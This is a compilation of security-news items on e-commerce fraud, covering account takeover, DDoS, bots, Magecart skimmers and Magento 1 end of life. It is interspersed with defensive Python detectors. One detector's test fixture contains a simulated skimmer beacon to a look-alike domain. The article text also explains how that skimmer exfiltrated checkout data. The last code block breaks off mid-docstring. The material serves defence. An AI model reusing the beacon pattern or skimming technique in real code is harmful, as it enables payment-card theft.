Attempted account takeover (ATO) attacks swelled 282 percent between Q2 2019 and Q2 2020, Sift reveals. Likewise, ATO rates for physical ecommerce businesses — those that sell physical goods online — jumped 378 percent since the start of the COVID-19 pandemic, indicating that fraudsters are leaning heavily on this attack vector to steal payment information and rewards points stored in online accounts on merchant websites.
According to Deloitte, ecommerce sales are forecast to grow 25-35 percent and are expected to generate between $182 billion and $196 billion this season.
When combined with the surge in ATO rates, the 2020 holiday shopping season presents the perfect opportunity for fraudsters to leverage account takeovers to take advantage of more people shopping online. This can have a devastating impact on companies including financial repercussions and brand abandonment.
Account hacking leads to brand abandonment
According to the research, ATO attacks also create significant and lasting brand damage. Based on a survey of 1,000 U.S. adult consumers, 28 percent of respondents would completely stop using a site or service if their accounts on that site were hacked.
And while consumers can secure their accounts by leveraging tools like password managers, multi-factor authentication (MFA), and by using unique passwords, they largely ignore these best practices. In fact, 66 percent of consumers surveyed either don’t use any type of password manager or aren’t sure if they do, despite 52 percent of them having concerns about becoming victims of ATO in the future, and 25 percent reporting that they have already had their accounts hacked at least once before.
- Attacks are fueled by automation: Between Q2 2019 and Q2 2020, ATO attacks happened in discrete waves about a week apart, indicating that fraudsters are turning to bots and automation in order to overwhelm trust & safety teams.
- Fraudsters sneak in and cash out: Of those who have experienced ATO, 41 percent of respondents reported that payment details were stolen and used to make purchases, and 37 percent of victims had money taken directly from their accounts. Another 37 percent had rewards points or credits taken and used to buy goods and services.
- Ecommerce is in the crosshairs: Of consumers who confirmed being victims of ATO attacks, a whopping 61 percent said their ecommerce (both physical and digital goods and services) accounts were hacked.
- Other online destinations on which consumers reported experiencing ATO include:
  - Social media sites: 36 percent
  - Financial services sites: 35 percent
  - Online dating sites: 22 percent
  - Travel sites: 19 percent
ATO attacks for financial gain
Like payment fraud and content abuse, two of the other links in the fraud supply chain, account takeover is typically a means to a financial end.
Using credentials either illicitly purchased on the dark web or obtained through techniques like credential stuffing, hackers gain access to user accounts on a business’s website and then make purchases on that website using stored payment information or rewards points. Attackers may also export the stored information in order to commit fraud across the web.
While consumers may be the immediate victim of these attacks, businesses ultimately face the real costs: in addition to reimbursing hacked customers, businesses face exorbitant chargeback fees and payment network fines when ATO leads to payment fraud.
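The credential-stuffing pattern described above (purchased credential lists replayed by bots) leaves a recognisable trace in authentication logs: one source trying many distinct usernames with a high failure ratio inside a short window, unlike a human who retries a single account. The detector below is an added example, not code from Sift or from this article; the log line format, the sample lines and the thresholds are assumptions chosen for illustration.

```python
"""Credential-stuffing detector over authentication log lines.

Flags source IPs whose sliding time window contains many *distinct*
usernames and mostly failed logins. Log format and thresholds are
assumptions made for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (assumed format: ISO timestamp, outcome, user, ip).
# 203.0.113.7 walks through many accounts; 198.51.100.3 is one user retrying.
SAMPLE_LOG = """\
2020-11-20T10:00:01Z login_failed user=alice ip=203.0.113.7
2020-11-20T10:00:02Z login_failed user=bob ip=203.0.113.7
2020-11-20T10:00:02Z login_failed user=carol ip=203.0.113.7
2020-11-20T10:00:03Z login_ok user=dave ip=203.0.113.7
2020-11-20T10:00:03Z login_failed user=erin ip=203.0.113.7
2020-11-20T10:00:04Z login_failed user=frank ip=203.0.113.7
2020-11-20T10:00:05Z login_failed user=alice ip=198.51.100.3
2020-11-20T10:00:09Z login_failed user=alice ip=198.51.100.3
2020-11-20T10:00:15Z login_ok user=alice ip=198.51.100.3
2020-11-20T10:07:00Z login_failed user=gina ip=203.0.113.7
"""

LINE_RE = re.compile(r"^(\S+) (login_ok|login_failed) user=(\S+) ip=(\S+)$")


def parse_log(text):
    """Return a list of (timestamp, succeeded, username, ip) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group(2) == "login_ok", m.group(3), m.group(4)))
    return events


def detect_stuffing(events, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.7):
    """Return {ip: (distinct_users, attempts, failures)} for sources whose
    best sliding window holds >= min_users distinct accounts with a failure
    ratio >= min_fail_ratio. A single user retrying is never flagged."""
    by_ip = defaultdict(list)
    for ts, ok, user, ip in sorted(events):
        by_ip[ip].append((ts, ok, user))

    flagged = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it is within `window` of evs[end]
            while evs[end][0] - evs[start][0] > window:
                start += 1
            current = evs[start:end + 1]
            users = {u for _, _, u in current}
            failures = sum(1 for _, ok, _ in current if not ok)
            if len(users) >= min_users and failures / len(current) >= min_fail_ratio:
                hit = (len(users), len(current), failures)
                if ip not in flagged or hit > flagged[ip]:
                    flagged[ip] = hit  # keep the widest window seen for this source
    return flagged


if __name__ == "__main__":
    for ip, (users, attempts, failures) in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {users} distinct accounts, {failures}/{attempts} failures -> likely credential stuffing")
```

In production the same logic would run over a streaming feed and the flagged source would feed a rate limit or step-up authentication (MFA challenge) rather than a plain block, since stuffing traffic is often spread over proxies and the occasional successful login inside such a window is exactly the takeover to investigate.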
Customer security as customer experience
“The surge in ATO attacks indicates that merchants can’t leave the burden of account security to their customers. Rather, companies should treat account protection as part of the overall customer experience and as a key part of their Digital Trust & Safety strategy, which allows for seamless transactions while preventing fraud.”
Forter released its Fraud Attack Index, delivering in-depth insight into the impact of COVID-19 on online buyer behavior and ecommerce fraud trends.
This edition revealed that:
- New customer accounts now represent 30% of transactions, five times more than they did pre-COVID-19. This is good news for retailers, but merchants using legacy fraud prevention systems could miss out on some of this revenue potential due to high false decline rates. Legacy systems lack data on new customers and cannot accurately distinguish between legitimate consumers and fraudsters.
- The growth in transactions driven by the consumer shift from brick-and-mortar stores to online purchasing is masking the fact that the number of fraud attacks has risen in real terms, leading retailers into a false sense of security.
- Omnichannel fraud is growing: Buy Online, Pick-up In Store (BOPIS) fraud rose 55% as new customer service options are subjected to significant fraud.
- With transactions falling by 97% compared with H1 2019, fraud attack rates in the travel industry more than doubled, with hotel fraud attacks rising 139% and airline fraud attacks increasing 144%.
- Account takeover (ATO) and Policy Abuse such as returns abuse, promotion abuse, and reseller abuse are set to surge during the holiday season.
Michael Reitblat, CEO of Forter, comments: “A rapid rise in new customer accounts, coupled with having to pivot quickly from brick-and-mortar to online sales channels, put unprecedented stress on merchants as they tried to perfect the ecommerce experience.
“It is clear from what we’ve seen that some retailers were more agile and prepared for this than others, quickly introducing new services such as curbside pickup and Buy Online, Pick-up In-Store, in a bid to retain new customers.
“To fully realize this new revenue potential, merchants need more accurate fraud prevention that can distinguish between these valuable new customers and fraudsters. Merchants can have a false decline rate between 5-7x higher for new customers – typical of legacy systems that do not have sufficient data on new account holders.”
Growth in transaction volumes masks increasing fraud attack numbers
There have been dramatic increases in transaction volumes across the majority of vertical sectors, but particularly those traditionally served by brick-and-mortar stores. Volumes rose 172% in home, furnishings and garden, 93% in food delivery & beverage and 119% in groceries.
Ecommerce fraud attacks decreased as a percentage of all transactions but in real terms, the number of fraud attacks has risen. This represents significant losses for retailers at a critical time.
Holiday season fraud surge expected
As retailers prepare for a critical holiday season and aim to recoup some of the year’s earlier losses, the research indicates that ATO attacks, and returns and delivery fraud will surge as fraudsters seek to exploit the increase in online shopping.
At the same time, customers will be more likely to take unfair advantage of promotions and abuse delivery and returns policies. Fraud and abuse trends that retailers need to prepare for include:
- Account takeover fraud to dramatically increase: The analysis indicates that fraudsters will seek to operationalize the data they’ve stolen and collected through data breaches and social engineering scams conducted during COVID-19 disruption. Also, new customer accounts opened by less experienced users are likely to use weaker passwords, fewer security steps, and be more vulnerable to ATO. As a result, retailers need to prepare for increasing ATO attacks during the holiday season.
- Returns and delivery fraud will continue to rise: Retailers increasingly offered omnichannel customer service options such as Buy Online, Return in Store (BORIS) and BOPIS, to satisfy new customers during COVID-19. Fraud attacks exploiting BOPIS policies increased 55% compared to H1 2019, as merchants offering frictionless experiences are less likely to ask for customer identification. It is anticipated that fraudsters will increasingly target and exploit returns and delivery services as online shopping surges over the holiday season.
- Policy abuse set to spike: Merchants courting new customers with aggressive promotions and user-friendly omnichannel options will expose themselves to greater abuse risk, including returns, promotion and reseller abuse.
Vikrant Gandhi, Senior Industry Director at Frost & Sullivan commented: “Fraud and policy abuse issues have magnified in the recent months in the global ecommerce industry. Our research indicates a rise in sophisticated fraud attempts, including promotions abuse by using synthetic identities and friendly fraud in 2020.
“The challenge for merchants is to deliver frictionless customer experiences without letting fraud prevention get in the way of doing so. Our recommendation to merchants is if they do not prioritize working with identity-based, integrated fraud prevention platforms that leverage behavioral analytics, machine learning and the power of big data that is informed and refined by highly trained analysts, they will never be able to stay ahead of fraudsters and policy abusers.”
Attackers focused on COVID-era lifelines such as healthcare, e-commerce, and educational services with complex, high-throughput attacks designed to overwhelm and quickly take them down, Netscout reveals.
“The first half of 2020 witnessed a radical change in DDoS attack methodology to shorter, faster, harder-hitting complex multi-vector attacks that we expect to continue,” stated Richard Hummel, threat intelligence lead, Netscout.
“Adversaries increased attacks against online platforms and services crucial in an increasingly digital world, such as e-commerce, education, financial services, and healthcare. No matter the target, adversary, or tactic used, it remains imperative that defenders and security professionals remain vigilant in these challenging days to protect the critical infrastructure that connects and enables the modern world.”
Record-breaking DDoS attacks at online platforms and services
More than 929,000 DDoS attacks occurred in May, representing the single largest number of attacks ever seen in a month. 4.83 million DDoS attacks occurred in the first half of 2020, a 15% increase. However, DDoS attack frequency jumped 25% during peak pandemic lockdown months (March through June).
Bad actors focused on shorter, more complex attacks
Super-sized 15-plus vector attacks increased 2,851% since 2017, while the average attack duration dropped 51% from the same period last year. Moreover, single-vector attacks fell 43% while attack throughput increased 31%, topping out at 407 Mpps.
The increase in attack complexity and speed, coupled with the decrease in duration, gives security teams less time to defend their organizations from increasingly sophisticated attacks.
Organizations and individuals bear the cost of cyber attacks
To determine the impact that DDoS attacks have on global Internet traffic, the Netscout ATLAS Security Engineering and Response Team (ASERT) developed the DDoS Attack Coefficient (DAC). It represents the amount of DDoS attack traffic traversing the internet in a given region or country during any one-minute period.
If no traffic can be attributed to DDoS, the amount would be zero. DAC identified top regional throughput of 877 Mpps in the Asia Pacific region, and top bandwidth of 2.8 Tbps in EMEA. DAC is important since cybercriminals don’t pay for bandwidth. It demonstrates the “DDoS tax” that every internet-connected organization and individual pays.
A LexisNexis Risk Solutions report tracks global cybercrime activity from January 2020 through June 2020. The period has seen strong transaction volume growth compared to 2019 but an overall decline in global attack volume. This is likely linked to growth in genuine customer activity due to changing consumer habits.
The report analyzes data from more than 22.5 billion transactions processed, a 37% growth year over year. Mobile device transactions also continue to rise, with 66% of all transactions coming from mobile devices in the first half of 2020, up from 20% in early 2015.
There’s also an uptick in transactions from new devices and new digital identities. This is attributed to many new-to-digital consumers moving online to procure goods and services that were no longer available in person or harder to access via a physical store, during the pandemic.
Attacks by region
The EMEA region saw lower overall attack rates in comparison to most other global regions from January through June 2020. This is due to a high volume of trusted login transactions across relatively mature mobile apps.
The attack patterns in EMEA were also more benign and had less volatility and fewer spikes in attack rates. However, there are some notable exceptions. Desktop transactions conducted from EMEA had a higher attack rate than the global average and automated bot attack volume grew 45% year over year.
The UK originates the highest volume of human-initiated cyberattacks in EMEA, with Germany and France second and third in the region. The UK is also the second largest contributor to global bot attacks behind the U.S.
One example of a UK banking fraud network saw more than $17 million exposed to fraud across 10 financial services organizations. This network alone consisted of 7,800 devices, 5,200 email addresses and 1,000 telephone numbers.
Decline in attack rate
The overall human-initiated attack rate fell through the first half of 2020, showing a 33% decline year over year. The breakdown by sector shows a 23% decline in financial services and a 55% decline in e-commerce attack rates.
Latin America experienced the highest attack rates of all regions globally and saw consistent growth in attack rates from March to June 2020. The attack patterns in North America and EMEA had less volatility and fewer spikes in attack rates over the six-month period observed.
Attack vector global view
Media is the only industry that recorded an overall year over year growth in human-initiated cyberattacks. There was a 3% increase solely across mobile browser transactions.
Globally, automated bots remain a key attack vector in the Digital Identity Network. Financial services organizations experienced a surge in automated bot attacks and continue to experience more bot attacks than any other industry.
Across the customer journey
New account creations see attacks at a higher rate than any other transaction type in the online customer journey. However, the largest volume of attacks targets online payments. Login transactions have seen the biggest drop in attack rate in comparison to other use cases.
Analysis across new customer touchpoints in the online journey is included in this report for the first time, providing additional context on key points of risk such as money transfers and password resets.
All industries have felt the impact of COVID-19. There are clear peaks and troughs in transaction volumes coinciding with global lockdown periods.
Financial services organizations realized a growth in new-to-digital banking users, a changing geographical footprint from previously well-traveled consumers and a reduction in the number of devices used per customer. There have also been several attacks targeting banks offering COVID-19-related loans.
E-commerce merchants have seen an increase in digital payments and several other key attack typologies that coincide with the lockdown period. These included account takeover attacks using identity spoofing and more first-party chargeback fraud.
Rebekah Moody, director of fraud and identity at LexisNexis Risk Solutions, said: “The move to digital, for both businesses and consumers, has been significant. Yet with this change comes opportunity for exploitation. Fraudsters look for easy targets: whether government support packages, new lines of credit or media companies with fewer barriers to entry.”
Many businesses are at risk from bot attacks, despite an awareness of the problem and a widely held belief that they have the problem under control, Netacea reveals.
Global businesses at risk from bot attacks
The research surveyed businesses across the travel, entertainment, e-commerce and financial services sectors. It found a high awareness of how bot attacks could negatively affect a business, with over 70% understanding the most common attacks, including credential stuffing and card cracking, and 76% stating they have been attacked by bots.
However, these same businesses revealed that around 15% of their web application resources are taken up by bots. With over half of web traffic today generated by bots, this implies that businesses are unaware of a great deal of the bot traffic on their sites.
Businesses were also wholly unaware of the marketplaces where their customers’ usernames and passwords can be bought and sold, with only 1% of respondents being familiar with them.
Entertainment sites most confident
Online entertainment sites, including gaming and streaming, were the most confident in their association of a bot attack with an incident, with over half claiming not to have been attacked in the last year.
Just over 20% of e-commerce sites claimed to not have been affected, while financial services and travel sites were the most aware of the ubiquity of attacks—fewer than 5% said that they had not been the victim of an attack.
Lack of visibility may be down to a lack of responsibility
This lack of visibility may be down to a lack of responsibility: only one in ten businesses say that bot mitigation is the responsibility of a single department or person. Almost two thirds say it is the responsibility of four or more departments, making passing the problem along—or even ignoring it completely—much more of a possibility.
“Current circumstances mean that businesses are relying on their online presence more than ever before,” said Andy Still, CTO, Netacea. “This also means more opportunities for online criminal enterprises looking to increase their profits. And while the majority of businesses are not oblivious to the problem of bot attacks, the inevitable conclusion of this research is that this awareness is not leading to action.”
“High profile attacks, such as ransomware that locks down sites completely, have dominated the headlines recently, which may have led to this complacency. Bot attacks, while more subtle, can be just as devastating to a business, as accounts are stolen and sold on, card fees become crippling, and bad decisions are made on the basis of faulty data,” cautioned Still.
The research did reveal some good news—nearly all businesses were either investing in, or planning to invest in bot management, and almost none were cutting back on this vital security measure.
Your payment card information got stolen but you don’t know how, when and where? Maybe you shopped on one of the 570 webshops compromised by the Keeper Magecart group (aka Magecart Group 8) since April 1, 2017.
Magecart Group 8’s modus operandi and targets
The list of the online shops hit by the criminals has been released by researchers from Gemini Advisory, who managed to compile it after gaining access to the group’s dedicated attack server that hosts both the malicious payload and the exfiltrated data stolen from victim sites.
“Analysis revealed that the Keeper group includes an interconnected network of 64 attacker domains used to deliver malicious JS payloads and 73 exfiltration domains used to receive stolen payment cards data from victim domains.
Their research also revealed that:
- Over 85% of the victim sites ran on the Magento CMS, 5% on WordPress, and 4% on Shopify
- The group tried to disguise its malicious attacker domains as legitimate services (e.g., the attacker domain closetlondon[.]org attempted to imitate closetlondon.com) and tried to imitate popular website plugins and payment gateways
- The majority of victim e-commerce sites were hosted in the U.S., followed by the U.K., the Netherlands, France, India, etc.
“The 570 victim e-commerce sites were made up of small to medium-sized merchants and were scattered across 55 different countries,” the researchers shared.
“Victims with the top Alexa Global Ranking received anywhere from 500,000 to over one million visitors each month and were responsible for selling electronics, clothing, jewelry, custom promotional products, and liquor.”
The attackers likely targeted small and medium-sized retailers because they are less likely to have a dedicated IT security team, to implement CMS and plugin patches promptly, and to have security measures in place and attack detection capabilities.
The profitability of Magecart attacks
The researchers estimated that the group may have generated over $7 million USD from selling compromised payment cards between 2017 and today.
“With revenue likely exceeding $7 million and increased cybercriminal interest in CNP [Card Not Present] data during the COVID-19 quarantine measures across the world, this group’s market niche appears to be secure and profitable,” they noted, and said that they expect the group to continue launching increasingly sophisticated attacks against online merchants across the world.
For the end users – i.e., the online shoppers – it’s all the same and, unfortunately, there is little they can do to protect themselves against the threat of getting their payment card info skimmed.
Magento 1 reaches EOL: Merchants urged to upgrade or risk breaches, falling out of PCI DSS compliance
When Adobe released security updates for Magento last week, it warned that the Magento 1.x branch is reaching end-of-life (EOL) and end-of-support (EOS) on June 30, 2020, and that those were the final security patches available for Magento Commerce 1.14 and Magento Open Source 1.
Unfortunately, there are still too many (over 100,000) active Magento 1.x installations. The company is urging their owners and admins to migrate to Magento 2.x or risk being hit once another critical and easily exploited vulnerability is unearthed and its existence made public.
Magento is a very popular open-source e-commerce platform that powers many online shops, a fact that hasn’t gone unnoticed by cyber criminals.
Nearly four years ago (and possibly even earlier), cyber crooks started concentrating on breaching Magento-based shops and injecting them with scripts that quietly grabbed users’ personal and payment card information and sent it to a server they controlled.
Since then, the tactic has been used and continues to be used by many cyber criminal groups, which have been classified by security companies as “Magecart” attackers. As they are quick to exploit newfound vulnerabilities in the Magento core and third-party extensions, hardly a day passes without news about another online shop having been compromised.
If you decide to stick with Magento 1
“If you have a store that continues to run on Magento 1 after June 30, please be aware that from that date forward you have increased responsibility for maintaining your site’s security and PCI DSS compliance,” Adobe warned.
Merchants that continue to use an unsupported Magento 1 version will have to implement compensating controls to re-certify PCI DSS compliance, such as signing up for and implementing third-party fixes and updates, continuously scanning their installations for malware, vulnerabilities and unauthorized accounts, using a web application firewall, and so on.
“General security vulnerabilities tend to increase the longer software is unsupported as hackers continue to use new technologies and techniques for exploitation. This raises the risk of attacks and security breaches over time and increases the possibility of exposing personally-identifiable customer data,” Adobe explained.
Companies risk their reputation, the trust of their customers, fines and may even lose their credit card processing ability if they fail to protect user information.
Another thing: the end of support for Magento 1 also means that some extensions merchants use will not be available anymore.
“We encourage Magento 1 merchants to download the Magento 1 extensions they plan to keep, since Magento 1 extensions will not be available in the Magento Marketplace after July 7, 2020, and will be removed from the Magento repository after August 6, 2020,” Adobe noted last week.
Magento 2 or something else?
PayPal, Visa and other payment processing companies and payment platforms have also been urging merchants to make the switch to Magento 2.
Even though Magento 2 was released five years ago, and even though the migration from Magento 1 to Magento 2 can be performed using an official Data Migration Tool, the number of Magento 2 installations is still lagging (it’s currently around 37,500 installations).
As “painful” and costly as it may be, this EOL will hopefully push many of them to finally make the switch – or make the switch to an alternative platform.
“2020 has been a tumultuous year for retailers. Merchants should not have to worry about security issues or upgrading their ecommerce platform while they are in the middle of adapting to drastically changed consumer behaviors and expectations. Amidst the list of business-critical priorities a merchant needs to focus on, worrying about what’s happening with a Magento migration or installation should not be included,” noted Jimmy Duvall, Chief Product Officer at BigCommerce.
Many people are using COVID-19 quarantine to get projects done at home, meaning plenty of online shopping for tools and supplies. But do you buy blind? Research shows 97% of consumers consult product reviews before making a purchase.
Fake reviews are a significant threat for online review portals and product search engines given the potential for damage to consumer trust. Little is known about what review portals should do with fraudulent reviews after detecting them.
A new study looks at how consumers respond to potentially fraudulent reviews and how review portals can leverage this information to design better fraud management policies.
“We find consumers have more trust in the information provided by review portals that display fraudulent reviews alongside nonfraudulent reviews, as opposed to the common practice of censoring suspected fraudulent reviews,” said Beibei Li of Carnegie Mellon University.
“The impact of fraudulent reviews on consumers’ decision-making process increases with the uncertainty in the initial evaluation of product quality.”
Fake reviews aid decision making
A study conducted by Li alongside Michael Smith, also of Carnegie Mellon University, and Uttara Ananthakrishnan of the University of Washington, says consumers do not effectively process the content of fraudulent reviews, whether it’s positive or negative. This result makes the case for incorporating fraudulent reviews and doing it in the form of a score to aid consumers’ decision making.
Fraudulent reviews occur when businesses artificially inflate ratings of their own products or artificially lower the ratings of a competitor’s product by generating fake reviews, either directly or through paid third parties.
“The growing interest in online product reviews for legitimate promotion has been accompanied by an increase in fraudulent reviews,” continued Li. “Research shows about 15%-30% of all online reviews are estimated to be fraudulent by various media and industry reports.”
Platforms don’t have a common way to handle fraudulent reviews. Some delete fraudulent reviews (Google), some publicly acknowledge censoring fake reviews (Amazon), while other portals, such as Yelp, go one step further by making the fraudulent reviews visible to the public with a notation that it is potentially fraudulent.
This study used large-scale data from Yelp to conduct experiments to measure trust and found that 80% of the users in its survey agree they trust a review platform more if it displays fake review information, because businesses are less likely to write fraudulent reviews on these platforms.
Transparency over censorship
Meanwhile, 85% of users in the survey believe they should have a choice in viewing truthful and fraudulent information, and that platforms should leave it to consumers to decide whether they use fraudulent review information in determining the quality of a business.
The study also finds that consumers tend to trust the information provided by platforms more when the platform distinguished and displayed fraudulent reviews from nonfraudulent reviews, as compared to the more common practice of censoring suspected fraudulent reviews.
“Our results highlight the importance of transparency over censorship and may have implications for public policy. Just as there are strong incentives to fraudulently manipulate consumer beliefs pertaining to commerce, there are also strong incentives to fraudulently manipulate individual beliefs pertaining to public policy decisions,” concluded Li.
When this fraudulent activity information is made available to all consumers, platforms can effectively embed a built-in penalty for businesses that are caught writing fake reviews.
A platform may admit to users that there is fraud on its site, but that is balanced by an increase in trust from consumers who already suspected that some reviews may be fraudulent and now see that something is being done to address it.
Magecart attackers have compromised web shops belonging to large retail chains Claire’s and Intersport and equipped them with payment card skimmers.
The compromise of Claire’s online store and that of its sister brand Icing has been flagged by Sansec researchers.
The skimmer was served from a domain made to look like it might belong to the company (claires-assets.com), and it was added to the two online stores between April 25th and 30th.
“The malware was added to the (otherwise legitimate) app.min.js file. This file is hosted on the store servers, so there is no “Supply Chain Attack” involved, and attackers have actually gained write access to the store code,” the researchers pointed out.
“The skimmer attaches to the submit button of the checkout form. Upon clicking, the full ‘Demandware Checkout Form’ is grabbed, serialized and base64 encoded. A temporary image is added to the DOM with the __preloader identifier. The image is located on the server as controlled by the attacker. Because all of the customer submitted data is appended to the image address, the attacker now has received the full payload. Immediately, the image element is removed.”
How the attackers managed to compromise the web shops is still unknown, but they started planning the attack a month before actually executing it. In fact, they registered the malicious domain a day after Claire’s announced that it would temporarily close all of its brick-and-mortar stores due to COVID-19.
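Two details above matter for defenders: the skimmer was injected into a first-party file (app.min.js) the store itself hosts, so subresource integrity on third-party scripts would not have caught it, and the stolen data left through a freshly registered look-alike domain (claires-assets.com). A monitor that baselines the served asset and watches for both a content change and a newly introduced outbound host covers the gap mentioned later in the article about noticing such breaches soon after they happen. The script below is an added example, not code from Sansec or the article; the store hostname shop.example, the allowlist, the brand tokens and both JavaScript fixtures are constructed for illustration.

```python
"""Asset integrity and outbound-host monitor for first-party JavaScript.

Compares a served asset against its recorded baseline and reports (a) any
content change and (b) any new external host the file now references,
tagging hosts that contain a brand token as look-alike domains.
All names below are constructed for this example.
"""
import hashlib
import re

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed fixtures: the file as deployed, and a later copy that gained an
# extra image beacon pointing at the look-alike domain named in the article.
BASELINE_JS = 'function checkout(){fetch("https://shop.example/api/pay",{method:"POST"});}\n'
MODIFIED_JS = BASELINE_JS + 'var p=new Image();p.src="https://claires-assets.com/pixel.gif";\n'

# Assumed allowlist of hosts the store's own JS is expected to reference.
FIRST_PARTY = {"shop.example", "cdn.shop.example"}
# Assumed brand tokens used to spot look-alike domains (cf. claires-assets.com).
BRAND_TOKENS = {"claires", "icing"}


def fingerprint(js):
    """Hash of the file plus the set of hosts it references."""
    return {
        "sha256": hashlib.sha256(js.encode("utf-8")).hexdigest(),
        "hosts": set(HOST_RE.findall(js)),
    }


def check_asset(name, baseline_js, current_js, allowlist=FIRST_PARTY, brand_tokens=BRAND_TOKENS):
    """Return a list of human-readable findings; empty means unchanged."""
    base, cur = fingerprint(baseline_js), fingerprint(current_js)
    findings = []
    if base["sha256"] != cur["sha256"]:
        findings.append(f"{name}: content changed ({base['sha256'][:12]} -> {cur['sha256'][:12]})")
    for host in sorted(cur["hosts"] - base["hosts"]):
        if host in allowlist:
            continue
        tag = "look-alike of brand" if any(t in host for t in brand_tokens) else "unexpected external host"
        findings.append(f"{name}: {tag} {host}")
    return findings


if __name__ == "__main__":
    for finding in check_asset("app.min.js", BASELINE_JS, MODIFIED_JS):
        print(finding)
```

A real deployment would fetch each asset from the public URL the browser uses (so server-side tampering and CDN-level changes are both seen), keep the baseline in a store the web server cannot write to, and treat any content change outside a known deploy as an incident. A content-security-policy with `connect-src` and `img-src` restricted to first-party hosts would additionally have blocked the exfiltration to the new domain in the browser, regardless of where the script was injected.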
ESET researchers have pointed out the compromise of Intersport’s web store and said that the company fixed the issue within several hours of ESET letting them know.
Sansec researchers say that an initial hack happened on Apr 30th and then another one on May 14th:
Intersport stores got hacked on Apr 30th, cleaned on May 3rd, then hacked again on May 14th.
— Sansec (@sansecio) June 15, 2020
Only the localized Intersport web shops serving customers from the Balkans region have been compromised.
It is still unknown how long the skimmers went unnoticed.
None of the compromised web shops sport a prominent notification about the breach and payment card info theft. Claire’s notified the payment card networks and law enforcement, and let’s hope they will contact affected customers directly once they determine the extent of the compromise and theft.
Companies should have protections in place to notice this and other types of breaches soon after they happen, but unfortunately many don’t.
If you’re paying for your purchases with payment cards – whether online or in physical stores – you should regularly check your account statements for unauthorized charges and report them quickly.
Trust among cybercriminals has eroded, causing a shift to e-commerce platforms and to communication over Discord, both of which increase user anonymity, Trend Micro reveals.
Popular underground goods and services
The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness.
Trends for cybercrime products and services
The report also illustrates the changing market trends for cybercrime products and services since 2015. Commoditization has driven prices down for many items. For example, crypting services fell from $1,000 to just $20 per month, while the price of generic botnets dropped from $200 to $5 per day.
Pricing for other items, including ransomware, Remote Access Trojans (RATs), online account credentials and spam services, remained stable, which indicates continued demand.
However, there has been a high demand for other services, such as IoT botnets, with new undetected malware variants selling for as much as $5,000. Also popular are fake news and cyber-propaganda services, with voter databases selling for hundreds of dollars, and gaming accounts for games like Fortnite can fetch around $1,000 on average.
Other underground market trends
Other notable findings include the emergence of markets for:
- Deepfake services for sextortion or to bypass photo verification requirements on some sites.
- AI-based gambling bots designed to predict dice roll patterns and crack complex Roblox CAPTCHA.
- Access-as-a-Service to hacked devices and corporate networks. Prices for Fortune 500 companies can reach up to US$10,000 and some services include access with read and write privileges.
- Wearable device accounts where access could enable cybercriminals to run warranty scams by requesting replacement devices.
Underground market trends will likely shift further in the months following the global COVID-19 pandemic, as attack opportunities continue to evolve. To protect against the ever-changing threat landscape, it is recommended to implement a multi-layered defense approach to protect against the latest threats and mitigate corporate security risk.
Account Takeover (ATO) attacks happen when a bad actor gains access to a legitimate customer’s eCommerce store account and uses that account for fraud.
The impact of ATO attacks
A new Riskified survey shows that ATO attacks have a huge negative impact on customers and merchants, damaging brand reputation and hurting merchants’ bottom lines. Despite that, many merchants lack security measures, and 35% of merchants report that at least 10% of their accounts have been taken over in the last 12 months.
Both merchants and customers value secure store accounts. Customers cite their convenience and the opportunity to earn rewards as notable benefits. Merchants report that account holders shop more often and spend more per purchase than other customers.
But accounts can also increase risk if they are not properly secured. Sixty-six percent of merchants and 69% of customers say they are concerned about their accounts getting hacked. Purchases made using compromised store accounts are hard for merchants to detect, because they look like they are made by legitimate returning customers.
ATO attacks are also very costly for merchants. When fraudsters use compromised accounts to make fraudulent purchases, not only does the merchant lose the revenue and the value of the goods sold, but it also often suffers serious damage to its brand reputation and diminished customer lifetime value.
65% of customers say they would likely stop buying from a merchant if their account was compromised. 54% of customers say they would delete their account, 39% would go to a competitor, and 30% say they would tell their friends to stop shopping with the merchant.
Preventing ATOs presents unique challenges
Because ATOs require only a login and stolen password, merchants have less data with which to evaluate the action, making detection and prevention difficult. Many merchants are failing to do so:
- 27% admit that they do not have measures in place to prevent ATOs.
- 24% of merchants can’t identify an ATO during a purchase.
- 14% of merchants say they are not even aware that an ATO has occurred unless a customer contacts them.
- Only 7.5% of customers learn their accounts were compromised from the merchant. The vast majority spot changes to their accounts or learn of unauthorized purchases.
Merchants that take steps to reduce ATOs risk hurting the customer experience. The most common approach to prevent ATOs is two-factor authentication for login attempts (62%), which can frustrate legitimate customers and increase cart abandonment.
Many merchants also require complex passwords to increase security, with 73% reporting that account passwords must contain a mix of characters, numbers, symbols and uppercase and lowercase letters.
This can help security, but it also increases friction and does little for customers who reuse passwords, meaning that store accounts are at risk through data breaches on other sites. That’s a real concern, as 47% of customers admit to using the same password for two or more online stores.
Embracing advanced technology may offer a solution
Because of their potential for serious financial and reputational harm – combined with the difficulty in detection – merchants need to use as much available data as possible to avoid ATOs. For example, merchants should look at the device and network details, proxy usage and previous logins to determine if the entity attempting to access the account is the rightful owner.
If the device or network is unfamiliar or exhibiting characteristics consistent with fraudsters, merchants should exercise caution by notifying the account owner or applying two-factor authentication.
Merchants also need to recognize that the account takeover isn’t the end goal. Fraudsters use ATO attacks to then place fraudulent orders, and merchants have the advantage of seeing that whole process.
An unfamiliar login or a change of details might seem suspicious initially, but if the cart that reaches checkout is low risk, then merchants can likely safely approve the order.
Similarly, if a safe-looking account event is followed by a chargeback, then merchants should take another look at the account activity and, likely, prompt the customer to change their password. When merchants ensure that these parts of the shopping journey – and the teams and solutions that manage them – are coordinated, they can decrease risk and increase revenue.
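The login, checkout and chargeback stages described above, worked through as an added example (not Riskified’s product or code). The signal names (device_id, asn, proxy, details_changed), the score weights and the thresholds are assumptions, and every account and event below is constructed sample data.

```python
"""Account-takeover risk across the shopping journey (added example).

Scores a login from the signals named in the text (device, network, proxy
usage, previous logins), re-evaluates at checkout against the cart's own
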